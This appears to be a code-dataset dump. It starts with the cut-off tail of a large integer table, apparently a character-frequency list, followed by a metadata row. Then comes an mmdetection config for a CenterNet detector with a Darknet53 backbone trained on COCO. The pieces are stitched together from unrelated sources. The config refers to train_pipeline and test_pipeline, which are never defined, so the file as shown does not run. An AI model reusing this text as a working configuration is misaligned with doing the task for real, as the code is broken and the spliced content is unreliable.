3360,4244, 290,1656,1317, 789, 827,2365,5152,3837,4566, 562, 581,4004,5153, 401, # 1408
4567,2252, 94,4568,5154,1399,2794,5155,1463,2025,4569,3218,1944,5156, 828,1105, # 1424
4245,1262,1394,5157,4246, 605,4570,5158,1784,2876,5159,2835, 819,2102, 578,2200, # 1440
2952,5160,1502, 436,3287,4247,3288,2836,4005,2919,3472,3473,5161,2721,2320,5162, # 1456
5163,2337,2068, 23,4571, 193, 826,3838,2103, 699,1630,4248,3098, 390,1794,1064, # 1472
3581,5164,1579,3099,3100,1400,5165,4249,1839,1640,2877,5166,4572,4573, 137,4250, # 1488
598,3101,1967, 780, 104, 974,2953,5167, 278, 899, 253, 402, 572, 504, 493,1339, # 1504
5168,4006,1275,4574,2582,2558,5169,3706,3049,3102,2253, 565,1334,2722, 863, 41, # 1520
5170,5171,4575,5172,1657,2338, 19, 463,2760,4251, 606,5173,2999,3289,1087,2085, # 1536
1323,2662,3000,5174,1631,1623,1750,4252,2691,5175,2878, 791,2723,2663,2339, 232, # 1552
2421,5176,3001,1498,5177,2664,2630, 755,1366,3707,3290,3151,2026,1609, 119,1918, # 1568
3474, 862,1026,4253,5178,4007,3839,4576,4008,4577,2265,1952,2477,5179,1125, 817, # 1584
4254,4255,4009,1513,1766,2041,1487,4256,3050,3291,2837,3840,3152,5180,5181,1507, # 1600
5182,2692, 733, 40,1632,1106,2879, 345,4257, 841,2531, 230,4578,3002,1847,3292, # 1616
3475,5183,1263, 986,3476,5184, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562, # 1632
4010,4011,2954, 967,2761,2665,1349, 592,2134,1692,3361,3003,1995,4258,1679,4012, # 1648
1902,2188,5185, 739,3708,2724,1296,1290,5186,4259,2201,2202,1922,1563,2605,2559, # 1664
1871,2762,3004,5187, 435,5188, 343,1108, 596, 17,1751,4579,2239,3477,3709,5189, # 1680
4580, 294,3582,2955,1693, 477, 979, 281,2042,3583, 643,2043,3710,2631,2795,2266, # 1696
1031,2340,2135,2303,3584,4581, 367,1249,2560,5190,3585,5191,4582,1283,3362,2005, # 1712
240,1762,3363,4583,4584, 836,1069,3153, 474,5192,2149,2532, 268,3586,5193,3219, # 1728
1521,1284,5194,1658,1546,4260,5195,3587,3588,5196,4261,3364,2693,1685,4262, 961, # 1744
1673,2632, 190,2006,2203,3841,4585,4586,5197, 570,2504,3711,1490,5198,4587,2633, # 1760
3293,1957,4588, 584,1514, 396,1045,1945,5199,4589,1968,2449,5200,5201,4590,4013, # 1776
619,5202,3154,3294, 215,2007,2796,2561,3220,4591,3221,4592, 763,4263,3842,4593, # 1792
5203,5204,1958,1767,2956,3365,3712,1174, 452,1477,4594,3366,3155,5205,2838,1253, # 1808
2387,2189,1091,2290,4264, 492,5206, 638,1169,1825,2136,1752,4014, 648, 926,1021, # 1824
1324,4595, 520,4596, 997, 847,1007, 892,4597,3843,2267,1872,3713,2405,1785,4598, # 1840
1953,2957,3103,3222,1728,4265,2044,3714,4599,2008,1701,3156,1551, 30,2268,4266, # 1856
5207,2027,4600,3589,5208, 501,5209,4267, 594,3478,2166,1822,3590,3479,3591,3223, # 1872
829,2839,4268,5210,1680,3157,1225,4269,5211,3295,4601,4270,3158,2341,5212,4602, # 1888
4271,5213,4015,4016,5214,1848,2388,2606,3367,5215,4603, 374,4017, 652,4272,4273, # 1904
375,1140, 798,5216,5217,5218,2366,4604,2269, 546,1659, 138,3051,2450,4605,5219, # 1920
2254, 612,1849, 910, 796,3844,1740,1371, 825,3845,3846,5220,2920,2562,5221, 692, # 1936
444,3052,2634, 801,4606,4274,5222,1491, 244,1053,3053,4275,4276, 340,5223,4018, # 1952
1041,3005, 293,1168, 87,1357,5224,1539, 959,5225,2240, 721, 694,4277,3847, 219, # 1968
1478, 644,1417,3368,2666,1413,1401,1335,1389,4019,5226,5227,3006,2367,3159,1826, # 1984
730,1515, 184,2840, 66,4607,5228,1660,2958, 246,3369, 378,1457, 226,3480, 975, # 2000
4020,2959,1264,3592, 674, 696,5229, 163,5230,1141,2422,2167, 713,3593,3370,4608, # 2016
4021,5231,5232,1186, 15,5233,1079,1070,5234,1522,3224,3594, 276,1050,2725, 758, # 2032
1126, 653,2960,3296,5235,2342, 889,3595,4022,3104,3007, 903,1250,4609,4023,3481, # 2048
3596,1342,1681,1718, 766,3297, 286, 89,2961,3715,5236,1713,5237,2607,3371,3008, # 2064
5238,2962,2219,3225,2880,5239,4610,2505,2533, 181, 387,1075,4024, 731,2190,3372, # 2080
5240,3298, 310, 313,3482,2304, 770,4278, 54,3054, 189,4611,3105,3848,4025,5241, # 2096
1230,1617,1850, 355,3597,4279,4612,3373, 111,4280,3716,1350,3160,3483,3055,4281, # 2112
2150,3299,3598,5242,2797,4026,4027,3009, 722,2009,5243,1071, 247,1207,2343,2478, # 2128
1378,4613,2010, 864,1437,1214,4614, 373,3849,1142,2220, 667,4615, 442,2763,2563, # 2144
3850,4028,1969,4282,3300,1840, 837, 170,1107, 934,1336,1883,5244,5245,2119,4283, # 2160
2841, 743,1569,5246,4616,4284, 582,2389,1418,3484,5247,1803,5248, 357,1395,1729, # 2176
3717,3301,2423,1564,2241,5249,3106,3851,1633,4617,1114,2086,4285,1532,5250, 482, # 2192
2451,4618,5251,5252,1492, 833,1466,5253,2726,3599,1641,2842,5254,1526,1272,3718, # 2208
4286,1686,1795, 416,2564,1903,1954,1804,5255,3852,2798,3853,1159,2321,5256,2881, # 2224
4619,1610,1584,3056,2424,2764, 443,3302,1163,3161,5257,5258,4029,5259,4287,2506, # 2240
3057,4620,4030,3162,2104,1647,3600,2011,1873,4288,5260,4289, 431,3485,5261, 250, # 2256
97, 81,4290,5262,1648,1851,1558, 160, 848,5263, 866, 740,1694,5264,2204,2843, # 2272
3226,4291,4621,3719,1687, 950,2479, 426, 469,3227,3720,3721,4031,5265,5266,1188, # 2288
424,1996, 861,3601,4292,3854,2205,2694, 168,1235,3602,4293,5267,2087,1674,4622, # 2304
3374,3303, 220,2565,1009,5268,3855, 670,3010, 332,1208, 717,5269,5270,3603,2452, # 2320
4032,3375,5271, 513,5272,1209,2882,3376,3163,4623,1080,5273,5274,5275,5276,2534, # 2336
3722,3604, 815,1587,4033,4034,5277,3605,3486,3856,1254,4624,1328,3058,1390,4035, # 2352
1741,4036,3857,4037,5278, 236,3858,2453,3304,5279,5280,3723,3859,1273,3860,4625, # 2368
5281, 308,5282,4626, 245,4627,1852,2480,1307,2583, 430, 715,2137,2454,5283, 270, # 2384
199,2883,4038,5284,3606,2727,1753, 761,1754, 725,1661,1841,4628,3487,3724,5285, # 2400
5286, 587, 14,3305, 227,2608, 326, 480,2270, 943,2765,3607, 291, 650,1884,5287, # 2416
1702,1226, 102,1547, 62,3488, 904,4629,3489,1164,4294,5288,5289,1224,1548,2766, # 2432
391, 498,1493,5290,1386,1419,5291,2056,1177,4630, 813, 880,1081,2368, 566,1145, # 2448
4631,2291,1001,1035,2566,2609,2242, 394,1286,5292,5293,2069,5294, 86,1494,1730, # 2464
4039, 491,1588, 745, 897,2963, 843,3377,4040,2767,2884,3306,1768, 998,2221,2070, # 2480
397,1827,1195,1970,3725,3011,3378, 284,5295,3861,2507,2138,2120,1904,5296,4041, # 2496
2151,4042,4295,1036,3490,1905, 114,2567,4296, 209,1527,5297,5298,2964,2844,2635, # 2512
2390,2728,3164, 812,2568,5299,3307,5300,1559, 737,1885,3726,1210, 885, 28,2695, # 2528
3608,3862,5301,4297,1004,1780,4632,5302, 346,1982,2222,2696,4633,3863,1742, 797, # 2544
1642,4043,1934,1072,1384,2152, 896,4044,3308,3727,3228,2885,3609,5303,2569,1959, # 2560
4634,2455,1786,5304,5305,5306,4045,4298,1005,1308,3728,4299,2729,4635,4636,1528, # 2576
2610, 161,1178,4300,1983, 987,4637,1101,4301, 631,4046,1157,3229,2425,1343,1241, # 2592
1016,2243,2570, 372, 877,2344,2508,1160, 555,1935, 911,4047,5307, 466,1170, 169, # 2608
1051,2921,2697,3729,2481,3012,1182,2012,2571,1251,2636,5308, 992,2345,3491,1540, # 2624
2730,1201,2071,2406,1997,2482,5309,4638, 528,1923,2191,1503,1874,1570,2369,3379, # 2640
3309,5310, 557,1073,5311,1828,3492,2088,2271,3165,3059,3107, 767,3108,2799,4639, # 2656
1006,4302,4640,2346,1267,2179,3730,3230, 778,4048,3231,2731,1597,2667,5312,4641, # 2672
5313,3493,5314,5315,5316,3310,2698,1433,3311, 131, 95,1504,4049, 723,4303,3166, # 2688
1842,3610,2768,2192,4050,2028,2105,3731,5317,3013,4051,1218,5318,3380,3232,4052, # 2704
4304,2584, 248,1634,3864, 912,5319,2845,3732,3060,3865, 654, 53,5320,3014,5321, # 2720
1688,4642, 777,3494,1032,4053,1425,5322, 191, 820,2121,2846, 971,4643, 931,3233, # 2736
135, 664, 783,3866,1998, 772,2922,1936,4054,3867,4644,2923,3234, 282,2732, 640, # 2752
1372,3495,1127, 922, 325,3381,5323,5324, 711,2045,5325,5326,4055,2223,2800,1937, # 2768
4056,3382,2224,2255,3868,2305,5327,4645,3869,1258,3312,4057,3235,2139,2965,4058, # 2784
4059,5328,2225, 258,3236,4646, 101,1227,5329,3313,1755,5330,1391,3314,5331,2924, # 2800
2057, 893,5332,5333,5334,1402,4305,2347,5335,5336,3237,3611,5337,5338, 878,1325, # 2816
1781,2801,4647, 259,1385,2585, 744,1183,2272,4648,5339,4060,2509,5340, 684,1024, # 2832
4306,5341, 472,3612,3496,1165,3315,4061,4062, 322,2153, 881, 455,1695,1152,1340, # 2848
660, 554,2154,4649,1058,4650,4307, 830,1065,3383,4063,4651,1924,5342,1703,1919, # 2864
5343, 932,2273, 122,5344,4652, 947, 677,5345,3870,2637, 297,1906,1925,2274,4653, # 2880
2322,3316,5346,5347,4308,5348,4309, 84,4310, 112, 989,5349, 547,1059,4064, 701, # 2896
3613,1019,5350,4311,5351,3497, 942, 639, 457,2306,2456, 993,2966, 407, 851, 494, # 2912
4654,3384, 927,5352,1237,5353,2426,3385, 573,4312, 680, 921,2925,1279,1875, 285, # 2928
790,1448,1984, 719,2168,5354,5355,4655,4065,4066,1649,5356,1541, 563,5357,1077, # 2944
5358,3386,3061,3498, 511,3015,4067,4068,3733,4069,1268,2572,3387,3238,4656,4657, # 2960
5359, 535,1048,1276,1189,2926,2029,3167,1438,1373,2847,2967,1134,2013,5360,4313, # 2976
1238,2586,3109,1259,5361, 700,5362,2968,3168,3734,4314,5363,4315,1146,1876,1907, # 2992
4658,2611,4070, 781,2427, 132,1589, 203, 147, 273,2802,2407, 898,1787,2155,4071, # 3008
4072,5364,3871,2803,5365,5366,4659,4660,5367,3239,5368,1635,3872, 965,5369,1805, # 3024
2699,1516,3614,1121,1082,1329,3317,4073,1449,3873, 65,1128,2848,2927,2769,1590, # 3040
3874,5370,5371, 12,2668, 45, 976,2587,3169,4661, 517,2535,1013,1037,3240,5372, # 3056
3875,2849,5373,3876,5374,3499,5375,2612, 614,1999,2323,3877,3110,2733,2638,5376, # 3072
2588,4316, 599,1269,5377,1811,3735,5378,2700,3111, 759,1060, 489,1806,3388,3318, # 3088
1358,5379,5380,2391,1387,1215,2639,2256, 490,5381,5382,4317,1759,2392,2348,5383, # 3104
4662,3878,1908,4074,2640,1807,3241,4663,3500,3319,2770,2349, 874,5384,5385,3501, # 3120
3736,1859, 91,2928,3737,3062,3879,4664,5386,3170,4075,2669,5387,3502,1202,1403, # 3136
3880,2969,2536,1517,2510,4665,3503,2511,5388,4666,5389,2701,1886,1495,1731,4076, # 3152
2370,4667,5390,2030,5391,5392,4077,2702,1216, 237,2589,4318,2324,4078,3881,4668, # 3168
4669,2703,3615,3504, 445,4670,5393,5394,5395,5396,2771, 61,4079,3738,1823,4080, # 3184
5397, 687,2046, 935, 925, 405,2670, 703,1096,1860,2734,4671,4081,1877,1367,2704, # 3200
3389, 918,2106,1782,2483, 334,3320,1611,1093,4672, 564,3171,3505,3739,3390, 945, # 3216
2641,2058,4673,5398,1926, 872,4319,5399,3506,2705,3112, 349,4320,3740,4082,4674, # 3232
3882,4321,3741,2156,4083,4675,4676,4322,4677,2408,2047, 782,4084, 400, 251,4323, # 3248
1624,5400,5401, 277,3742, 299,1265, 476,1191,3883,2122,4324,4325,1109, 205,5402, # 3264
2590,1000,2157,3616,1861,5403,5404,5405,4678,5406,4679,2573, 107,2484,2158,4085, # 3280
3507,3172,5407,1533, 541,1301, 158, 753,4326,2886,3617,5408,1696, 370,1088,4327, # 3296
4680,3618, 579, 327, 440, 162,2244, 269,1938,1374,3508, 968,3063, 56,1396,3113, # 3312
2107,3321,3391,5409,1927,2159,4681,3016,5410,3619,5411,5412,3743,4682,2485,5413, # 3328
2804,5414,1650,4683,5415,2613,5416,5417,4086,2671,3392,1149,3393,4087,3884,4088, # 3344
5418,1076, 49,5419, 951,3242,3322,3323, 450,2850, 920,5420,1812,2805,2371,4328, # 3360
1909,1138,2372,3885,3509,5421,3243,4684,1910,1147,1518,2428,4685,3886,5422,4686, # 3376
2393,2614, 260,1796,3244,5423,5424,3887,3324, 708,5425,3620,1704,5426,3621,1351, # 3392
1618,3394,3017,1887, 944,4329,3395,4330,3064,3396,4331,5427,3744, 422, 413,1714, # 3408
3325, 500,2059,2350,4332,2486,5428,1344,1911, 954,5429,1668,5430,5431,4089,2409, # 3424
4333,3622,3888,4334,5432,2307,1318,2512,3114, 133,3115,2887,4687, 629, 31,2851, # 3440
2706,3889,4688, 850, 949,4689,4090,2970,1732,2089,4335,1496,1853,5433,4091, 620, # 3456
3245, 981,1242,3745,3397,1619,3746,1643,3326,2140,2457,1971,1719,3510,2169,5434, # 3472
3246,5435,5436,3398,1829,5437,1277,4690,1565,2048,5438,1636,3623,3116,5439, 869, # 3488
2852, 655,3890,3891,3117,4092,3018,3892,1310,3624,4691,5440,5441,5442,1733, 558, # 3504
4692,3747, 335,1549,3065,1756,4336,3748,1946,3511,1830,1291,1192, 470,2735,2108, # 3520
2806, 913,1054,4093,5443,1027,5444,3066,4094,4693, 982,2672,3399,3173,3512,3247, # 3536
3248,1947,2807,5445, 571,4694,5446,1831,5447,3625,2591,1523,2429,5448,2090, 984, # 3552
4695,3749,1960,5449,3750, 852, 923,2808,3513,3751, 969,1519, 999,2049,2325,1705, # 3568
5450,3118, 615,1662, 151, 597,4095,2410,2326,1049, 275,4696,3752,4337, 568,3753, # 3584
3626,2487,4338,3754,5451,2430,2275, 409,3249,5452,1566,2888,3514,1002, 769,2853, # 3600
194,2091,3174,3755,2226,3327,4339, 628,1505,5453,5454,1763,2180,3019,4096, 521, # 3616
1161,2592,1788,2206,2411,4697,4097,1625,4340,4341, 412, 42,3119, 464,5455,2642, # 3632
4698,3400,1760,1571,2889,3515,2537,1219,2207,3893,2643,2141,2373,4699,4700,3328, # 3648
1651,3401,3627,5456,5457,3628,2488,3516,5458,3756,5459,5460,2276,2092, 460,5461, # 3664
4701,5462,3020, 962, 588,3629, 289,3250,2644,1116, 52,5463,3067,1797,5464,5465, # 3680
5466,1467,5467,1598,1143,3757,4342,1985,1734,1067,4702,1280,3402, 465,4703,1572, # 3696
510,5468,1928,2245,1813,1644,3630,5469,4704,3758,5470,5471,2673,1573,1534,5472, # 3712
5473, 536,1808,1761,3517,3894,3175,2645,5474,5475,5476,4705,3518,2929,1912,2809, # 3728
5477,3329,1122, 377,3251,5478, 360,5479,5480,4343,1529, 551,5481,2060,3759,1769, # 3744
2431,5482,2930,4344,3330,3120,2327,2109,2031,4706,1404, 136,1468,1479, 672,1171, # 3760
3252,2308, 271,3176,5483,2772,5484,2050, 678,2736, 865,1948,4707,5485,2014,4098, # 3776
2971,5486,2737,2227,1397,3068,3760,4708,4709,1735,2931,3403,3631,5487,3895, 509, # 3792
2854,2458,2890,3896,5488,5489,3177,3178,4710,4345,2538,4711,2309,1166,1010, 552, # 3808
681,1888,5490,5491,2972,2973,4099,1287,1596,1862,3179, 358, 453, 736, 175, 478, # 3824
1117, 905,1167,1097,5492,1854,1530,5493,1706,5494,2181,3519,2292,3761,3520,3632, # 3840
4346,2093,4347,5495,3404,1193,2489,4348,1458,2193,2208,1863,1889,1421,3331,2932, # 3856
3069,2182,3521, 595,2123,5496,4100,5497,5498,4349,1707,2646, 223,3762,1359, 751, # 3872
3121, 183,3522,5499,2810,3021, 419,2374, 633, 704,3897,2394, 241,5500,5501,5502, # 3888
838,3022,3763,2277,2773,2459,3898,1939,2051,4101,1309,3122,2246,1181,5503,1136, # 3904
2209,3899,2375,1446,4350,2310,4712,5504,5505,4351,1055,2615, 484,3764,5506,4102, # 3920
625,4352,2278,3405,1499,4353,4103,5507,4104,4354,3253,2279,2280,3523,5508,5509, # 3936
2774, 808,2616,3765,3406,4105,4355,3123,2539, 526,3407,3900,4356, 955,5510,1620, # 3952
4357,2647,2432,5511,1429,3766,1669,1832, 994, 928,5512,3633,1260,5513,5514,5515, # 3968
1949,2293, 741,2933,1626,4358,2738,2460, 867,1184, 362,3408,1392,5516,5517,4106, # 3984
4359,1770,1736,3254,2934,4713,4714,1929,2707,1459,1158,5518,3070,3409,2891,1292, # 4000
1930,2513,2855,3767,1986,1187,2072,2015,2617,4360,5519,2574,2514,2170,3768,2490, # 4016
3332,5520,3769,4715,5521,5522, 666,1003,3023,1022,3634,4361,5523,4716,1814,2257, # 4032
574,3901,1603, 295,1535, 705,3902,4362, 283, 858, 417,5524,5525,3255,4717,4718, # 4048
3071,1220,1890,1046,2281,2461,4107,1393,1599, 689,2575, 388,4363,5526,2491, 802, # 4064
5527,2811,3903,2061,1405,2258,5528,4719,3904,2110,1052,1345,3256,1585,5529, 809, # 4080
5530,5531,5532, 575,2739,3524, 956,1552,1469,1144,2328,5533,2329,1560,2462,3635, # 4096
3257,4108, 616,2210,4364,3180,2183,2294,5534,1833,5535,3525,4720,5536,1319,3770, # 4112
3771,1211,3636,1023,3258,1293,2812,5537,5538,5539,3905, 607,2311,3906, 762,2892, # 4128
1439,4365,1360,4721,1485,3072,5540,4722,1038,4366,1450,2062,2648,4367,1379,4723, # 4144
2593,5541,5542,4368,1352,1414,2330,2935,1172,5543,5544,3907,3908,4724,1798,1451, # 4160
5545,5546,5547,5548,2936,4109,4110,2492,2351, 411,4111,4112,3637,3333,3124,4725, # 4176
1561,2674,1452,4113,1375,5549,5550, 47,2974, 316,5551,1406,1591,2937,3181,5552, # 4192
1025,2142,3125,3182, 354,2740, 884,2228,4369,2412, 508,3772, 726,3638, 996,2433, # 4208
3639, 729,5553, 392,2194,1453,4114,4726,3773,5554,5555,2463,3640,2618,1675,2813, # 4224
919,2352,2975,2353,1270,4727,4115, 73,5556,5557, 647,5558,3259,2856,2259,1550, # 4240
1346,3024,5559,1332, 883,3526,5560,5561,5562,5563,3334,2775,5564,1212, 831,1347, # 4256
4370,4728,2331,3909,1864,3073, 720,3910,4729,4730,3911,5565,4371,5566,5567,4731, # 4272
5568,5569,1799,4732,3774,2619,4733,3641,1645,2376,4734,5570,2938, 669,2211,2675, # 4288
2434,5571,2893,5572,5573,1028,3260,5574,4372,2413,5575,2260,1353,5576,5577,4735, # 4304
3183, 518,5578,4116,5579,4373,1961,5580,2143,4374,5581,5582,3025,2354,2355,3912, # 4320
516,1834,1454,4117,2708,4375,4736,2229,2620,1972,1129,3642,5583,2776,5584,2976, # 4336
1422, 577,1470,3026,1524,3410,5585,5586, 432,4376,3074,3527,5587,2594,1455,2515, # 4352
2230,1973,1175,5588,1020,2741,4118,3528,4737,5589,2742,5590,1743,1361,3075,3529, # 4368
2649,4119,4377,4738,2295, 895, 924,4378,2171, 331,2247,3076, 166,1627,3077,1098, # 4384
5591,1232,2894,2231,3411,4739, 657, 403,1196,2377, 542,3775,3412,1600,4379,3530, # 4400
5592,4740,2777,3261, 576, 530,1362,4741,4742,2540,2676,3776,4120,5593, 842,3913, # 4416
5594,2814,2032,1014,4121, 213,2709,3413, 665, 621,4380,5595,3777,2939,2435,5596, # 4432
2436,3335,3643,3414,4743,4381,2541,4382,4744,3644,1682,4383,3531,1380,5597, 724, # 4448
2282, 600,1670,5598,1337,1233,4745,3126,2248,5599,1621,4746,5600, 651,4384,5601, # 4464
1612,4385,2621,5602,2857,5603,2743,2312,3078,5604, 716,2464,3079, 174,1255,2710, # 4480
4122,3645, 548,1320,1398, 728,4123,1574,5605,1891,1197,3080,4124,5606,3081,3082, # 4496
3778,3646,3779, 747,5607, 635,4386,4747,5608,5609,5610,4387,5611,5612,4748,5613, # 4512
3415,4749,2437, 451,5614,3780,2542,2073,4388,2744,4389,4125,5615,1764,4750,5616, # 4528
4390, 350,4751,2283,2395,2493,5617,4391,4126,2249,1434,4127, 488,4752, 458,4392, # 4544
4128,3781, 771,1330,2396,3914,2576,3184,2160,2414,1553,2677,3185,4393,5618,2494, # 4560
2895,2622,1720,2711,4394,3416,4753,5619,2543,4395,5620,3262,4396,2778,5621,2016, # 4576
2745,5622,1155,1017,3782,3915,5623,3336,2313, 201,1865,4397,1430,5624,4129,5625, # 4592
5626,5627,5628,5629,4398,1604,5630, 414,1866, 371,2595,4754,4755,3532,2017,3127, # 4608
4756,1708, 960,4399, 887, 389,2172,1536,1663,1721,5631,2232,4130,2356,2940,1580, # 4624
5632,5633,1744,4757,2544,4758,4759,5634,4760,5635,2074,5636,4761,3647,3417,2896, # 4640
4400,5637,4401,2650,3418,2815, 673,2712,2465, 709,3533,4131,3648,4402,5638,1148, # 4656
502, 634,5639,5640,1204,4762,3649,1575,4763,2623,3783,5641,3784,3128, 948,3263, # 4672
121,1745,3916,1110,5642,4403,3083,2516,3027,4132,3785,1151,1771,3917,1488,4133, # 4688
1987,5643,2438,3534,5644,5645,2094,5646,4404,3918,1213,1407,2816, 531,2746,2545, # 4704
3264,1011,1537,4764,2779,4405,3129,1061,5647,3786,3787,1867,2897,5648,2018, 120, # 4720
4406,4407,2063,3650,3265,2314,3919,2678,3419,1955,4765,4134,5649,3535,1047,2713, # 4736
1266,5650,1368,4766,2858, 649,3420,3920,2546,2747,1102,2859,2679,5651,5652,2000, # 4752
5653,1111,3651,2977,5654,2495,3921,3652,2817,1855,3421,3788,5655,5656,3422,2415, # 4768
2898,3337,3266,3653,5657,2577,5658,3654,2818,4135,1460, 856,5659,3655,5660,2899, # 4784
2978,5661,2900,3922,5662,4408, 632,2517, 875,3923,1697,3924,2296,5663,5664,4767, # 4800
3028,1239, 580,4768,4409,5665, 914, 936,2075,1190,4136,1039,2124,5666,5667,5668, # 4816
5669,3423,1473,5670,1354,4410,3925,4769,2173,3084,4137, 915,3338,4411,4412,3339, # 4832
1605,1835,5671,2748, 398,3656,4413,3926,4138, 328,1913,2860,4139,3927,1331,4414, # 4848
3029, 937,4415,5672,3657,4140,4141,3424,2161,4770,3425, 524, 742, 538,3085,1012, # 4864
5673,5674,3928,2466,5675, 658,1103, 225,3929,5676,5677,4771,5678,4772,5679,3267, # 4880
1243,5680,4142, 963,2250,4773,5681,2714,3658,3186,5682,5683,2596,2332,5684,4774, # 4896
5685,5686,5687,3536, 957,3426,2547,2033,1931,2941,2467, 870,2019,3659,1746,2780, # 4912
2781,2439,2468,5688,3930,5689,3789,3130,3790,3537,3427,3791,5690,1179,3086,5691, # 4928
3187,2378,4416,3792,2548,3188,3131,2749,4143,5692,3428,1556,2549,2297, 977,2901, # 4944
2034,4144,1205,3429,5693,1765,3430,3189,2125,1271, 714,1689,4775,3538,5694,2333, # 4960
3931, 533,4417,3660,2184, 617,5695,2469,3340,3539,2315,5696,5697,3190,5698,5699, # 4976
3932,1988, 618, 427,2651,3540,3431,5700,5701,1244,1690,5702,2819,4418,4776,5703, # 4992
3541,4777,5704,2284,1576, 473,3661,4419,3432, 972,5705,3662,5706,3087,5707,5708, # 5008
4778,4779,5709,3793,4145,4146,5710, 153,4780, 356,5711,1892,2902,4420,2144, 408, # 5024
803,2357,5712,3933,5713,4421,1646,2578,2518,4781,4782,3934,5714,3935,4422,5715, # 5040
2416,3433, 752,5716,5717,1962,3341,2979,5718, 746,3030,2470,4783,4423,3794, 698, # 5056
4784,1893,4424,3663,2550,4785,3664,3936,5719,3191,3434,5720,1824,1302,4147,2715, # 5072
3937,1974,4425,5721,4426,3192, 823,1303,1288,1236,2861,3542,4148,3435, 774,3938, # 5088
5722,1581,4786,1304,2862,3939,4787,5723,2440,2162,1083,3268,4427,4149,4428, 344, # 5104
1173, 288,2316, 454,1683,5724,5725,1461,4788,4150,2597,5726,5727,4789, 985, 894, # 5120
5728,3436,3193,5729,1914,2942,3795,1989,5730,2111,1975,5731,4151,5732,2579,1194, # 5136
425,5733,4790,3194,1245,3796,4429,5734,5735,2863,5736, 636,4791,1856,3940, 760, # 5152
1800,5737,4430,2212,1508,4792,4152,1894,1684,2298,5738,5739,4793,4431,4432,2213, # 5168
479,5740,5741, 832,5742,4153,2496,5743,2980,2497,3797, 990,3132, 627,1815,2652, # 5184
4433,1582,4434,2126,2112,3543,4794,5744, 799,4435,3195,5745,4795,2113,1737,3031, # 5200
1018, 543, 754,4436,3342,1676,4796,4797,4154,4798,1489,5746,3544,5747,2624,2903, # 5216
4155,5748,5749,2981,5750,5751,5752,5753,3196,4799,4800,2185,1722,5754,3269,3270, # 5232
1843,3665,1715, 481, 365,1976,1857,5755,5756,1963,2498,4801,5757,2127,3666,3271, # 5248
433,1895,2064,2076,5758, 602,2750,5759,5760,5761,5762,5763,3032,1628,3437,5764, # 5264
3197,4802,4156,2904,4803,2519,5765,2551,2782,5766,5767,5768,3343,4804,2905,5769, # 5280
4805,5770,2864,4806,4807,1221,2982,4157,2520,5771,5772,5773,1868,1990,5774,5775, # 5296
5776,1896,5777,5778,4808,1897,4158, 318,5779,2095,4159,4437,5780,5781, 485,5782, # 5312
938,3941, 553,2680, 116,5783,3942,3667,5784,3545,2681,2783,3438,3344,2820,5785, # 5328
3668,2943,4160,1747,2944,2983,5786,5787, 207,5788,4809,5789,4810,2521,5790,3033, # 5344
890,3669,3943,5791,1878,3798,3439,5792,2186,2358,3440,1652,5793,5794,5795, 941, # 5360
2299, 208,3546,4161,2020, 330,4438,3944,2906,2499,3799,4439,4811,5796,5797,5798, # 5376
)
| 83.663014 | 245 | 0.732816 |
ace8bfa066a9c6f4f65febf6dd966ee867db460a | 3,123 | py | Python | configs/eftnet/T2_eft53_hmctrd27_whratio03_v1l_2lr_wd3e4_s123_nos_2x.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | configs/eftnet/T2_eft53_hmctrd27_whratio03_v1l_2lr_wd3e4_s123_nos_2x.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | configs/eftnet/T2_eft53_hmctrd27_whratio03_v1l_2lr_wd3e4_s123_nos_2x.py | mrsempress/mmdetection | cb650560c97a2fe56a9b369a1abc8ec17e06583a | [
"Apache-2.0"
] | null | null | null | # model settings
model = dict(
type='CenterNet',
pretrained='./pretrain/darknet53.pth',
backbone=dict(
type='DarknetV3',
layers=[1, 2, 8, 8, 4],
inplanes=[3, 32, 64, 128, 256, 512],
planes=[32, 64, 128, 256, 512, 1024],
norm_cfg=dict(type='BN'),
out_indices=(1, 2, 3, 4),
frozen_stages=1,
norm_eval=False),
neck=dict(type='None'),
bbox_head=dict(
type='CXTHead',
inplanes=(128, 256, 512, 1024),
head_conv=128,
wh_conv=64,
use_deconv=False,
norm_after_upsample=False,
hm_head_conv_num=2,
wh_head_conv_num=2,
ct_head_conv_num=1,
fovea_hm=False,
num_classes=81,
use_exp_wh=False,
wh_offset_base=16,
wh_agnostic=True,
shortcut_cfg=(1, 2, 3),
shortcut_attention=(False, False, False),
norm_cfg=dict(type='BN'),
norm_wh=False,
avg_wh_weightv3=False,
hm_center_ratio=0.27,
center_ratio=0.3,
hm_init_value=None,
giou_weight=5.,
merge_weight=1.,
hm_weight=1.,
ct_weight=1.))
cudnn_benchmark = True
# training and testing settings
train_cfg = dict(
vis_every_n_iters=100,
debug=False)
test_cfg = dict(
score_thr=0.01,
max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=12,
workers_per_gpu=4,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
# optimizer
optimizer = dict(type='SGD', lr=0.002, momentum=0.9, weight_decay=0.0003,
paramwise_options=dict(bias_lr_mult=2., bias_decay_mult=0.))
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 5,
step=[18, 22])
checkpoint_config = dict(save_every_n_steps=200, max_to_keep=1, keep_every_n_epochs=18)
bbox_head_hist_config = dict(
model_type=['ConvModule', 'DeformConvPack'],
sub_modules=['bbox_head'],
save_every_n_steps=200)
# yapf:disable
log_config = dict(interval=20)
# yapf:enable
# runtime settings
total_epochs = 24
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = 'eft53_htct027_whratio3_v1l_2lr_wd3e4_s123_nos_2x'
load_from = None
